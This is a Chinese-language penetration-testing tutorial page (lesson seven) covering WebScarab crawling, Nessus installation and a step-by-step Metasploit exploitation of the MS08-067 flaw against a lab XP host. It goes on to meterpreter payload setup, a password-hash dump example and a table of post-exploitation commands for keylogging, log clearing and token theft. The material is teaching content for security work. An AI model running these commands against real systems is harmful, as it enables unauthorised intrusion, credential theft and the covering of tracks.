渗透测试与漏洞利用系列课程【第七课】

2018-04-1407:00:22 发表评论

渗透测试与漏洞利用系列课程【第七课】

渗透测试实践

信息收集

部分内容被隐藏
需登陆后可查看

webscarab

webscarab :web爬行 / 目录爆破 / xss测试等。简单做爬虫演示:

打开proxy选项卡中的listener选项卡配置代理端口,IP地址填127.0.0.1,点击start开启代理服务

渗透测试与漏洞利用系列课程【第七课】

打开浏览器,设置代理服务器为127.0.0.1端口为自己在webscarab中设置的端口

渗透测试与漏洞利用系列课程【第七课】

配置好代理后,在浏览器中访问目标网站,然后打开webscarabspider选项卡,选择起始点的请求(目标站点),点击Fecth Tree就可以在messages选项卡中看到请求信息:

渗透测试与漏洞利用系列课程【第七课】

在spider窗格中双击自己目标站点前的文件夹图标就可以查看爬到的目录以及文件

渗透测试与漏洞利用系列课程【第七课】

扫描

Nessus号称是世界上最流行的漏洞扫描程序,提供完整的电脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描。

安装Nessus工具

为了顺利的使用Nessus工具,则必须要将该工具安装在系统中。Nessus工具不仅可以在电脑上使用,而且还可以在手机上使用。本节将介绍在不同操作系统平台及手机上安装Nessus工具的方法。

  1. 获取Nessus安装包Nessus的官方下载地址是:http://www.tenable.com/products/nessus/select-your-operating-system

    选择Nessus Home,进行下载

    Home家庭版 / 免费 --- Professional专业版 / 付费

  2. 获取激活码输入以下地址: http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code

    单击 Nessus Home Free下面的 Register Now---填写信息 -- Register --- 邮箱收到激活码

  3. Nessus工具在Kali Linux下安装
    • 从官网上下载安装包。本例中下载的安装包文件名为Nessus-6.6.2-debian6_i386.deb
    • 安装命令:dpkg |I Nessus-6.6.2-debian6_i386.deb
    • 启动Nessus:/etc/init.d/nessusd start
    • 打开浏览器,输入网址:https://127.0.0.1:8834

    第一次登陆,会有风险提示,选择“我知道风险”的选项,确认

    手动更新Nessus,即在控制台中,运行命令:/opt/nessus/sbin/nessuscli update --plugins-only

    完成更新后,重新启动Nessus,即使用命令:/etc/init.d/nessusd restart

Nessus扫描

----挺简单的,自己试试就好了

漏洞利用

xp存在 MS08-067的漏洞,用 msfconsole中的 search命令查找该漏洞的渗透攻击模块:


msf > search MS08-067
Maching Modules
=================
NameDisclosure Date Rank Description
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corrupyion

然后用use命令选用该模块、并使用show options来查看选项:


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

optionsRHOST没有被设置 -- 用 set进行设置


msf exploit(ms08_067_netapi) > set RHOST 192.168.32.131

利用exploit命令进行利用:


msf exploit(ms08_067_netapi) > exploit

 

利用后,可以看到XP系统中出现 -- svchost.exe --应用程序错误

以上仅仅使用了模块重现了溢出漏洞。

如果使用攻击载荷,则可以对目标系统实施更进一步的攻击,比如植入木马,获取目标主机的控制权等。在使用该模块后,可以使用show payloads指令来查看所有的攻击载荷:


msf exploit(ms08_067_netapi) > show payloads

可以看到很多的攻击载荷,常见载荷有:

  • reverse_tcp:path : payload/windows/meterpreter/reverse_tcp,反向连接shell,使用起来很稳定。需要设置LHOST
  • bind_tcp:path : payload/windows/meterpreter/bind_tcp,正向连接shell。需要设置RHOST

我们设置该攻击载荷:set payload windows/meterpreter/bind_tcp --- show options -- 设置RHOSTset RHOST 192.168.32.131

show targets查看可选的目标操作系统类型,选择合适的目标操作系统 --- 设置版本号 set target 34

然后就可以 exploit 啦 -- 利用成功,进入meterpreter

事实上,在利用exploit进行漏洞利用前,可以check查看目标机是否可攻击, 渗透成功后,会返回meterpreter shell

后渗透攻击

挖掘用户名和密码

微软Windows系统存储哈希值的方式一般为LAN Manger(LM)、NT LAN Manger(NTLM),或NT LAN Manger v2(NTLMv2)

部分内容被隐藏
需登陆后可查看

 

渗透测试与漏洞利用系列课程【第七课】

例如,UID为500的Administrator用户密码的哈希值如下。其中第一个哈希是LM哈希值,第二个则是NTLM哈希值

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

得到这些 HASH 值之后,可以利用工具对 HASH 值暴力破解,得到明文 or 在一些渗透脚本中,以HASH值作为输入,完成对目标主机的登录。

获取控制权

利用shell命令可以获得目标主机的控制台,有了控制台,就可以对目标系统进行任意文件操作,也可以执行各类DOS命令。

具体的Meterpreter命令如下:

命令含义
核心命令
?帮助菜单
background将当前会话移动到背景
bgkill杀死一个背景 meterpreter 脚本
bglist提供所有正在运行的后台脚本的列表
bgrun作为一个后台线程运行脚本
channel显示活动频道
close关闭通道
exit终止 meterpreter 会话
help帮助菜单
interact与通道进行交互
irb进入 Ruby 脚本模式
migrate移动到一个指定的 PID 的活动进程
quit终止 meterpreter 会话
read从通道读取数据
run执行以后它选定的 meterpreter 脚本
use加载 meterpreter 的扩展
write将数据写入到一个通道
文件系统命令
cat读取并输出到标准输出文件的内容
cd更改目录对受害人
del删除文件对受害人
download从受害者系统文件下载
edit用 vim编辑文件
getlwd打印本地目录
getwd打印工作目录
lcd更改本地目录
lpwd打印本地目录
ls列出在当前目录中的文件列表
mkdir在受害者系统上的创建目录
pwd输出工作目录
rm删除文件
rmdir受害者系统上删除目录
upload从攻击者的系统往受害者系统上传文件
网络命令
ipconfig显示网络接口的关键信息,包括 IP 地址等
portfwd端口转发
route查看或修改受害者路由表
系统命令
clearav清除了受害者的计算机上的事件日志
drop_token被盗的令牌
execute执行命令
getpid获取当前进程 ID (PID)
getprivs尽可能获取尽可能多的特权
getuid获取作为运行服务器的用户
kill终止指定 PID 的进程
ps列出正在运行的进程
reboot重新启动受害人的计算机
reg与受害人的注册表进行交互
rev2self在受害者机器上调用 RevertToSelf()
shell在受害者计算机上打开一个shell
shutdown关闭了受害者的计算机
steal_token试图窃取指定的 (PID) 进程的令牌
sysinfo获取有关受害者计算机操作系统和名称等的详细信息
用户界面命令
enumdesktops列出所有可访问台式机
getdesktop获取当前的 meterpreter 桌面
idletime检查长时间以来,受害者系统空闲进程
keyscan_dump键盘记录软件的内容转储
keyscan_start启动时与如 Word 或浏览器的进程相关联的键盘记录软件
keyscan_stop停止键盘记录软件
screenshot抓去 meterpreter 桌面的屏幕截图
set_desktop更改 meterpreter 桌面
uictl启用用户界面组件的一些控件
特权升级命令
getsystem获得系统管理员权限
密码转储命令
hashdump抓去哈希密码 (SAM) 文件中的值
Timestomp 命令
timestomp操作修改,访问,并创建一个文件的属性

 

CE安全网
CE安全网广告位招租

发表评论

您必须登录才能发表评论!